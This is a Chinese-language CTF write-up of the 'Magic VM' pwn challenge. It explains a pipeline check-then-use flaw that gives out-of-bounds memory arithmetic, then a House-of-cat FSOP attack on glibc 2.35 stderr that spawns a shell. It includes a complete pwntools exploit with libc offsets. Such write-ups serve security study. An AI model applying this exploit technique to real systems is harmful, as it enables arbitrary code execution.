Pwn VM writeup

国赛期间，做了一个很有意思的pwn题，顺便学了一下现在常见的pwn的板子题是什么样子的，这里做一下记录
Magic VM
题目逻辑
题目本身其实非常的有趣，它实现了一个简易流水线的功能，程序中包含四个结构体，其中三个分别对应流水线中的三个流程：

ID
ALU
MEM
程序用一个叫做vm的结构体来统筹这三个对象，并且使用vm_id vm_alu vm_mem来控制整体的逻辑处理过程。

struct attribute((aligned(8))) vm
{
char *reg0[4];
__int64 now_stack_ptr;
unsigned __int64 pc;
char *code_base;
__int64 data_base;
__int64 stack_base;
__int64 code_size;
__int64 data_size;
_int64 stack_size;
vm_id *id;
vm_alu *alu;
vm_mem *mem;
};

/* 6 */
struct attribute((aligned(8))) vm_alu
{
char *is_valid;
__int64 each_opcode_OPTYPE;
__int64 ops_total_type;
__int64 op1_addr_or_reg;
__int64 op2_addr_or_reg;
int result_type;
int mem_num;
__int64 dst_op_value;
__int64 alu_result;
__int64 now_stack_ptr;
__int64 stack_ptr;
};

/* 7 */
struct attribute((aligned(8))) vm_mem
{
int mem_valid_result_type;
int mem_idx;
__int64 dst_op_value;
__int64 src_alu_result;
__int64 now_stack_ptr;
__int64 next_vm;
};

/* 8 */
struct attribute((aligned(8))) vm_id
{
char *is_valid;
__int64 each_opcode;
__int64 ops1_total_type;
__int64 op1_addr_or_reg;
__int64 op2_addr_or_reg;
};

题目主要逻辑很简单，会用一个mmap的空间来作为代码段，数据段和栈帧：

void __fastcall vm::vm(vm *this)
{
vm_id *id; // rax
vm_alu *alu; // rax
vm_mem *mem; // rax
__int64 i; // rdx

this->code_base = (char *)mmap(0LL, 0x6000uLL, 3, 34, -1, 0LL);
this->data_base = (_int64)(this->code_base + 0x2000);
this->stack_base = this->data_base + 0x3000;
this->data_size = 0x3000LL;
this->code_size = 0x2000LL;
this->stack_size = 0x1000LL;

// skip code…
}
代码段大小为0x2000，数据段为0x3000，栈帧为0x1000。

±---------------------------+
| |
| 0x2000 code |
| |
| |
| |
| |
±---------------------------+
| |
| |
| 0x3000 data |
| |
| |
| |
| |
| |
| |
| |
±---------------------------+
| |
| 0x1000 stack |
| |
| |
±---------------------------+
其中代码段存放我们读入的数据作为指令，并且再vm::run中进行解码译码

int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 v3; // rax

setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
v3 = std::operator<<<std::char_traits>(&std::cout, “plz input your vm-code”);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits>);
read(0, my_vm.code_base, 0x2000uLL);
vm::run(&my_vm);
return 0;
}
解码逻辑如下

__int64 __fastcall vm::run(vm *vm)
{ // 第一次读取到id
// 第二次alu发生运算
// 第三次mem发生位移
__int64 v1; // rax
int v3; // [rsp+1Ch] [rbp-4h]

while ( 1 )
{
vm_alu::set_input(vm->alu, vm);
vm_mem::set_input(vm->mem, vm);
vm->pc += (int)vm_id::run(vm->id, vm);
v3 = vm_alu::run(vm->alu, vm);
vm_mem::run(vm->mem, vm);
if ( !v3 )
break;
if ( v3 == -1 )
{
v1 = std::operator<<<std::char_traits>(&std::cout, “SOME STHING WRONG!!”);
std::ostream::operator<<(v1, &std::endl<char,std::char_traits>);
exit(0);
}
}
return 0LL;
}
其中对应关系如下

vm_id::run:ID 译码阶段，进行指令的翻译和边界检查
vm_alu::run:ALU 阶段，对译码的指令进行执行，计算等
vm_mem::run:MEM 阶段，将计算阶段的结果存放在译码阶段指定的地址
循环开头的两个set_input会如同流水线般，将上次循环中得到的数据传递给下一个阶段:

         +----------+                                   |          |                                   

Loop 1 | ID 1 |
| |
±----±—+
|
±-------------+
|
±----------+ ±—v------+
| | | |
Loop 2 | ID 2 | | ALU 1 |
| | | |
±----±----+ ±----±----+
| |
| ±----------------+
±-------------+ |
| |
| |
±----------+ ±—v-------+ ±-----v-----+
| | | | | |
Loop 3 | ID 3 | | ALU 2 | | MEM 1 |
| | | | | |
±----------+ ±-----------+ ±-----------+
可以得出结论：

当前指令再循环1被ID解析的读入数据，会在循环3被MEM进行存储

举例来说，假设对于指令mov r1, r2，这个程序的处理逻辑如下：

第一次循环中，由vm_id读取指令，解析操作数
第二次循环中，在vm_alu::set_input中，将id中的数据传递给alu，此时调用vm_alu::run进行计算操作
第三次循环中，在vm_mem::set_input中，将alu中的数据传递给mem，此时调用vm_mem::run进行赋值操作
在这个虚拟机中，无论操作寄存器，还是内存地址，均需要使用三步操作完成。

由前面的定义可知，程序的id中只记录操作类型，alu记录操作类型，计算结果和存储位置，mem仅记录存储位置。

ID 译码
在译码阶段，会涉及虚拟机的一些支持的指令类型，在虚拟机中包含三个寄存器，以及栈帧，支持地址访问和十种操作：

opcode = {
“ADD”:1,
“SUB”:2,
“SHL”:3,
“SHR”:4,
“MOV”:5,
“AND”:6,
“OR”:7,
“XOR”:8,
“PUSH”:9,
“POP”:10,
“NOP”:11,
}
指令格式如下

[opcode][optype][value1][value2]
其中optype定义了两个操作数的类型。第1，2bit用于定义第一个操作数的类型，第3，4bit用于定义第二个操作数类型。类型支持如下三种

NUM（1）:仅当成数据，value长度为8字节
REG（2）:作为寄存器下标（0~3）value长度为1字节
ADDR（3）:将value作为寄存器下标（0~3），取寄存器的值当成地址，
其中，当我们的使用id解析类似mov r1, [r2]的模拟指令的时候，会检查r2是否超出了database的范围

else if ( ope1_type == OP_ADDR ) // 均为1，作为地址解析
{
opcode_len = 3;
v6 = buf_ptr_next2;
buf_ptr_next2 = (__int64 *)((char *)buf_ptr_next2 + 1);
v13 = *(_BYTE )v6;
if ( vm_id::check_addr(id, (unsigned __int64)vm->reg0[(char *)v6], vm) ) // 检查当前寄存器中指向的值是否越界
{
id->each_opcode = each_opcode;
id->op1_addr_or_reg = v13; // 此时为地址
}
else
{
id->each_opcode = -1LL;
}
}
如果直接使用寄存器，则同样的也会检测选择寄存器的时候是否会选择0~3以外的寄存器

if ( ope1_type == OP_REG ) // 检查第一个ops类型
{
opcode_len = 3;
v5 = buf_ptr_next2;
buf_ptr_next2 = (__int64 *)((char *)buf_ptr_next2 + 1);
v12 = *(_BYTE *)v5;
if ( vm_id::check_regs(id, *(char *)v5, vm) )// 检查是否为寄存器
{
id->each_opcode = each_opcode;
id->op1_addr_or_reg = v12; // 此时为寄存器
}
else
{
id->each_opcode = -1LL;
}
}
之后，ID对象就会记录以下数据，之后会在下一个循环中传递给ALU

指令
操作数类型
操作数1
操作数2
ALU 计算
在ALU进行计算的时候，会根据由ID传递的操作类型，取出对应的寄存器或者内存地址

v4 = vm_alu->ops_total_type & 3;
if ( v4 == OP_REG ) // 检查第一个操作数的类型
{
vm_alu->mem_num = 1;
vm_alu->dst_op_value = (__int64)&vm->reg0[vm_alu->op1_addr_or_reg];// 寄存器的操作
vm_alu->op1_addr_or_reg = (__int64)vm->reg0[vm_alu->op1_addr_or_reg];
}
else
{
if ( v4 != OP_ADDR )
return 0xFFFFFFFFLL; // 第一个类型需要为地址，同时使得op1_addr_or_reg为越界的地址
if ( (vm_alu->ops_total_type & 0xC) == 12 )
return 0xFFFFFFFFLL;
vm_alu->mem_num = 1;
vm_alu->dst_op_value = (__int64)&vm->reg0[vm_alu->op1_addr_or_reg][vm->data_base];// 否则，作为地址操作
vm_alu->op1_addr_or_reg = *(_QWORD *)&vm->reg0[vm_alu->op1_addr_or_reg][vm->data_base];// vm_start+op1_offset+data_base
}
注意，在ALU中，会把我们的操作数1作为目的操作数，无论里面指定的是寄存器还是内存地址，都会取出其指针放在dst_op_value，之后就会进行运算操作。

switch ( vm_alu->each_opcode_OPTYPE )
{
case ADD:
vm_alu->alu_result = vm_alu->op2_addr_or_reg + vm_alu->op1_addr_or_reg;
break;
case MIN:
vm_alu->alu_result = vm_alu->op1_addr_or_reg - vm_alu->op2_addr_or_reg;
break;
case LMOV:
vm_alu->alu_result = vm_alu->op1_addr_or_reg << vm_alu->op2_addr_or_reg;
break;
case RMOV:
vm_alu->alu_result = (unsigned __int64)vm_alu->op1_addr_or_reg >> vm_alu->op2_addr_or_reg;
break;
case OP2:
vm_alu->alu_result = vm_alu->op2_addr_or_reg;
break;
case AND:
vm_alu->alu_result = vm_alu->op2_addr_or_reg & vm_alu->op1_addr_or_reg;
break;
case OR:
vm_alu->alu_result = vm_alu->op2_addr_or_reg | vm_alu->op1_addr_or_reg;
break;
case XOR:
vm_alu->alu_result = vm_alu->op2_addr_or_reg ^ vm_alu->op1_addr_or_reg;
break;
default:
goto EXITCALC;
}
goto EXITCALC;
完成计算后，下列值会被保留，传递给MEM

alu_result：计算的结果
dst_op_value：用于存放运算结果的地址
mem_num：发生了变化的内存地址，如果是PUSH或者POP指令，此时会需要改变内存地址的值（栈指针，栈指向的内存）
result_type：表示当前运算是否有效（指令是否正确等等），会传递给MEM的mem_valid_result_type成员
MEM 存放
MEM部分比较简单，会根据来自ALU传递的值进行赋值处理

__int64 __fastcall vm_mem::run(vm_mem *this, vm *a2)
{
__int64 mem_valid; // rax
int i; // [rsp+1Ch] [rbp-4h]

mem_valid = (unsigned int)this->mem_valid_result_type;
if ( (_DWORD)mem_valid )
{
for ( i = 0; ; ++i )
{
mem_valid = (unsigned int)this->mem_idx;
if ( i >= (int)mem_valid )
break;
**((_QWORD **)&this->dst_op_value + 2 * i) = *(&this->src_alu_result + 2 * i);
}
}
return mem_valid;
}
这里再提一次，在这个虚拟机模拟过程中，虽然它也实现了寄存器，但是对寄存器的操作本质上等同对内存地址空间的操作，也是使用引用进行赋值，所以本质上等同内存操作。

程序漏洞
乍一看，程序的执行非常有逻辑：

ID 解析指令，并且检查访问是否越界
ALU 根据ID 解析的结果进行数据的分析计算
MEM 存储对应的数据
但是这里有一个非常典型的问题，那就是：检查和使用不处在同一个上下文中。这句话怎么理解呢？对于这个题目而言，上下文就是指在同一个循环中。我们根据题目会发现，程序进行变量检查的时候发生在ID环节，而当进入ALU环节的时候，已经在下一个循环，而进入MEM环节，甚至在下两个循环了。这样会有什么问题呢？让我们假设一系列指令如下:

0:add r1, 0xffff
1:mov r1, 0
2:add r2, [r1]
3:nop
4:nop
最初的时候，0被解析

0:add r1, 0xffff < — ID
1:mov r1, 0
2:add r2, [r1]
3:nop
4:nop
当执行1的时候，1被解析，0被计算

0:add r1, 0xffff < — ALU
1:mov r1, 0 < — ID
2:add r2, [r1]
3:nop
4:nop
我们来讨论当执行2的时候，发生了什么

0:add r1, 0xffff < — MEM
1:mov r1, 0 < — ALU
2:add r2, [r1] < — ID
3:nop
4:nop
正常逻辑上讲，当我们执行到2的时候，由于r1=0xffff，超出了database，此时理论上这条指令是没办法由ID进行解析的。然而实际上此时执行的内容是这样的

0:add r1, 0xffff < — MEM
1:mov r1, 0 < — ALU
2:add r2, [0] < — ID 这里发生了什么？
3:nop
4:nop
正如我们前面提到的流水线问题，这里r1也正处在MEM阶段，而且根据代码逻辑，此时为ID->ALU->MEM的调用顺序，也就是说此时的r1仍未被正确赋值。
那么根据逻辑来说，此时的2这条指令能够通过ID的解码阶段。那么，当执行3的时候，会变成这样

0:add r1, 0xffff
1:mov r1, 0 < — MEM
2:add r2, [r1] < — ALU
3:nop < — ID
4:nop
根据执行顺序，此时的ALU阶段中，r1已经被赋值成了0xffff，但是依然通过了ID的check。

0:add r1, 0xffff
1:mov r1, 0 < — MEM
2:add r2, [0xffff] < — ALU 发生了越界访问！！！
3:nop < — ID
4:nop
综合流程，我们可以通过这个漏洞获得越界的任意地址加减的能力。

EXP
实际上，这个题目基本上也算是获得了任意位置读写的能力，不过在比赛期间我比较着急，没有想的那么清楚，以为只有一个任意地址加减的能力，下文也将以这个前提讨论漏洞利用。

由于本人不太熟悉2.35的利用手法，于是咨询了队友，在队友的提示下考虑到可以通过文件指针操作来进行攻击，攻击方式可以参考这里 提到的一种叫做House of cat的攻击策略，简单来说就是FSOP，但是使用的是_OI_wfile_JUMP的表，并且利用类似House of Emma的思路，对vtable偏移进行微调，从而实现调用seekoff函数，实现劫持。

程序自带一个exit函数，所以当我们完成了指令的编写之后，它自然会通过exit退出程序，通过_IO_flush_all_lockp诱发漏洞。

这种利用方式其实蛮多人利用过，这位师傅已经讲的很清楚了，我基本上就是照着这位师傅提到的点进行布局。
在这道题在做的时候，有一个小坑，在这个文章中的评论区也有人提到，也就是mode参数不对：

__off64_t __fastcall IO_wfile_seekoff(_IO_FILE *file, __int64 offset, unsigned int dir, int mode)
{
v4 = a1;
v101 = __readfsqword(0x28u);
wide_data = file->_wide_data;
if ( !a4 )
{
// 这其中无法使用当前攻击流程
}

_IO_write_base = (unsigned __int64)wide_data->_IO_write_base;
_IO_write_ptr = (unsigned __int64)wide_data->_IO_write_ptr;
v9 = offset;
if ( *(_OWORD *)&wide_data->_IO_read_base == PAIR128(_IO_write_ptr, wide_data->_IO_read_end) )
{
LODWORD(v93) = 1;
}
else
{
LODWORD(v93) = 0;
if ( _IO_write_base < _IO_write_ptr )
goto LABEL_4;
}
if ( (file->_flags & 0x800) == 0 )
{
if ( wide_data->_IO_buf_base )
goto LABEL_6;
goto LABEL_36;
}
LABEL_4:
v10 = IO_switch_to_wget_mode(&file->_flags); /// 关键要进入这个函数
}

__int64 __fastcall IO_switch_to_wget_mode(_IO_FILE *a1)
{
struct _IO_wide_data *wide_data; // rax
wchar_t *IO_write_ptr; // rdx
__int64 result; // rax
int flags; // ecx

wide_data = a1->_wide_data;
IO_write_ptr = wide_data->_IO_write_ptr;
if ( IO_write_ptr > wide_data->_IO_write_base )
{
result = (*((__int64 (__fastcall **)(_IO_FILE *, __int64))wide_data->_wide_vtable + 3))(a1, 0xFFFFFFFFLL); // 关注这里
if ( (_DWORD)result == -1 )
return result;
wide_data = a1->_wide_data;
IO_write_ptr = wide_data->_IO_write_ptr;
}
// 包含其他逻辑
}
攻击链使用的是IO_switch_to_wget_mode函数，但是这个函数需要在参数mode!=0的时候触发，而在这道题的时候不满足这条条件，追踪调用流能看到对应的位置发生赋值的地方:

__int64 __fastcall IO_flush_all_lockp(int a1){

// 省略部分代码
if ( file->_mode > 0 )
{
_wide_data = file->_wide_data;
v3 = _wide_data->_IO_write_base;
if ( _wide_data->_IO_write_ptr > v3 )
goto LABEL_8;
}
else if ( file->_IO_write_ptr > file->_IO_write_base )
{
LABEL_8:
vtable = *(_QWORD *)&file[1]._flags;
if ( &unk_7FC0EAE64768 - (_UNKNOWN *)qword_7FC0EAE63A00 <= (unsigned __int64)(vtable - (_QWORD)qword_7FC0EAE63A00) )
{
v14 = *(_QWORD *)&file[1]._flags;
sub_7FC0EACD6EF0(lock, vtable - (_QWORD)qword_7FC0EAE63A00);
vtable = v14;
}
lock = (__int64 )&file->_flags;
if ( ((unsigned int (__fastcall **)(void *, __int64, void *, void *))(vtable + 24))( //OVERFLOW 函数调用
file,
0xFFFFFFFFLL,
(void *)v8,
v3) == -1 )

其实本来这里的v3（也就是第四个参数mode）是不存在的，但是毕竟我们是强制修改了调用函数的位置，所以这里相当于强行激活了这个参数。
观察程序可知，第四个参数来自于_wide_data->_IO_write_base，同时还必须保证file->_mode > 0以及_wide_data->_IO_write_ptr > _wide_data->_IO_write_base才能满足，于是这个位置新增需求如下

file->_mode > 0
_wide_data->_IO_write_ptr > _wide_data->_IO_write_base（只有大于才会赋值v3）
_wide_data->_IO_write_base != 0（满足seekoff函数的mode）
梳理所有的需求，可以知道这个板子的调用条件为:

FILE->_IO_write_base_IO_write_ptr
wide_data->_IO_write_base < wide_data->_IO_write_ptr
wide_data->_IO_read_end != wide_data->_IO_read_ptr
FILE->_lock可写（这一个条件来自于之前提到的_IO_flush_all_lockp函数要求）
file->_mode > 0
_wide_data->_IO_write_base != 0（满足seekoff函数的mode）
总共六条。同时为了实现利用，需要修改如下的点:

FILE->flag=“/bin/sh”
wide_data->jump(0xe0 offset)->0x18 = system
两条要求，总共八条。

一些踩坑
由于我以为题目仅有任意地址加减的能力，于是在利用过程中使用了已有的stderr 流，利用其中残留的指针进行相对偏移，从而实现漏洞利用。
我这里使用的是异常流，但是为了诱导程序触发flush，需要保证异常流中存在缓存。而这一题默认情况下异常流是空的，所以还需要通过主动的修改FILE->_IO_write_base_IO_write_ptr来保证攻击能够触发。
整体exp如下

from pwn import *

“”"
[opcode][optype][value1][value2]
“”"

opcode = {
“ADD”:1,
“SUB”:2,
“LMOV”:3,
“RMOV”:4,
“OP2”:5,
“AND”:6,
“OR”:7,
“XOR”:8,
“PUSH”:9,
“POP”:10,
“NOP”:11,
}

push and pop will select this one default

RET_REG = 1

def generate_type(t):
if t == “NUM”:
# address
return 1
elif t == “ADDR”:
# address
return 3
else:
# register
return 2

push last value into stack

def push_value():
shellcode = b’’
shellcode += p8(opcode[“PUSH”])
# push value
# optype
shellcode += p8(generate_type(“REG”))
# opvalue, select reg1
shellcode += b’\x01’
return shellcode

push last value into stack

def add_value(value):
shellcode = b’’
shellcode += p8(opcode[“ADD”])
# push value
# optype
# add reg,num
shellcode += p8(((generate_type(“NUM”) << 2) | generate_type(“REG”)))
# opvalue, select reg1
shellcode += p8(RET_REG)
shellcode += p64(value)

return shellcode

def sub_value_reg(value):
shellcode = b’’
shellcode += p8(opcode[“SUB”])
# push value
# optype
# sub [reg],num
shellcode += p8(((generate_type(“NUM”) << 2) | generate_type(“REG”)))
# opvalue, select reg1
shellcode += p8(RET_REG)
shellcode += p64(value)

return shellcode

def sub_value(value):
shellcode = b’’
shellcode += p8(opcode[“SUB”])
# push value
# optype
# sub [reg],num
shellcode += p8(((generate_type(“NUM”) << 2) | generate_type(“ADDR”)))
# opvalue, select reg1
shellcode += p8(RET_REG)
shellcode += p64(value)

return shellcode

def xor_value_reg(value):
shellcode = b’’
shellcode += p8(opcode[“XOR”])
shellcode += p8(((generate_type(“NUM”) << 2) | generate_type(“REG”)))
# opvalue, select reg1
shellcode += p8(3)
shellcode += p64(value)

return shellcode

pop value out of stack

def pop_value():
shellcode = b’’
shellcode += p8(opcode[“POP”])
# push value
# optype
shellcode += p8(generate_type(“REG”))
# opvalue, select reg1
shellcode += b’\x01’
return shellcode

set result with value and reg

def set_value_reg(value, reg):
shellcode = b’’
shellcode += p8(opcode[“OP2”])
# push value
# optype
types = ((generate_type(“NUM”) << 2) | generate_type(“REG”))
shellcode += p8(types)
# opvalue, select reg1
shellcode += p8(reg)
# opvalue as op2
shellcode += p64(value)
return shellcode

def nop():
shellcode = b’’
shellcode += p8(opcode[“NOP”])
return shellcode

OFFSET_TO_LIBC = 0x9000
def off(offset):
return OFFSET_TO_LIBC+offset

def generate_read(offset, value):
shellcode = b’’
# here set the mov offset
shellcode += add_value(offset) # ID
shellcode += set_value_reg(0, RET_REG) # ALU
# here use add/sub to calculate the
shellcode += sub_value(value) # ID -> MEM
shellcode += nop() # ALU calculate
shellcode += nop() # MEM saving data

return shellcode

context.terminal = [‘tmux’, ‘splitw’, ‘-h’, ‘-F’ ‘#{pane_pid}’, ‘-P’]

ph = process(“./pwn”)

gdb.attach(ph)

libc offset

LIBC_STDERR = 0x21b6a0

stderr_vtable = libc + 0xd8

STDERR_VTABLE = LIBC_STDERR + 0xd8

wide_data = libc + 0x21a8a0

WIDE_DATA = 0x21a8a0

IO_READ_PTR = wide_data+0 bypass check1

IO_READ_PTR_OFF = 0

IO_READ_PTR = wide_data+0 bypass check2

IO_WRITE_PTR_OFF = 0x20

OVERFLOW call

WFILE_JUMP = 0x2170c0
_IO_WOVERFLOW_OFFSET=0x18

modify it to system

SYSTEM = 0x50D70
_IO_WFILE_OVERFLOW = 0x086390

IO_2_1_stderr+131 = 0x7f492b71a723

system = 0x7f492b54fd70

system_off = IO_2_1_stderr+131 - system = 0x1ca9b3

minuse to /bin/sh

SYSTEM_OFF = _IO_WFILE_OVERFLOW - SYSTEM

modified vtable

IO_wfile_jumps

_IO_file_jumps - _IO_wfile_jumps + 0x30(offset to seekoff)

modify vtbale

modify _wide_data(0xa0)->_IO_read_ptr

modify _wide_data(0xa0)->_IO_write_ptr

_wide_data(0xe0)??? no need to modify

_wide_data->WFILE_JUMP->IO(0x18)

x /40gx (char*)&IO_2_1_stderr

0xffffffffffffba20

finally comes to function _IO_switch_to_wget_mode to call

shellcode1 = generate_read(off(STDERR_VTABLE), 0x510) + generate_read(off(LIBC_STDERR+0x28), 0xffffffffffffff00)+ generate_read(off(LIBC_STDERR+0xc0), 0xffffffffffffffff) + generate_read(off(WIDE_DATA), 0xfffffffffffffaf0) + generate_read(off(WIDE_DATA+0x18), 0xfffffffffffffaf0) + generate_read(off(WIDE_DATA+0x20), 0xfffffffffffffa00) + generate_read(off(WIDE_DATA+0x20), 0xffffffffffffff00) + generate_read(off(WIDE_DATA+0xe0), 0xffffffffffffba20) + generate_read(off(LIBC_STDERR+0x18), 0x1ca9b3) + generate_read(off(LIBC_STDERR), 0xff978cd18d43be58)

set debug

debug_shellcode = xor_value_reg(0)
debug_shellcode += nop()
debug_shellcode += nop()

ph.sendline(shellcode1+debug_shellcode)

ph.interactive()

总结
题目的设计非常有意思，流水线是一种比较实际的场景，这种漏洞模式在真实场景中甚至会存在，具有学习价值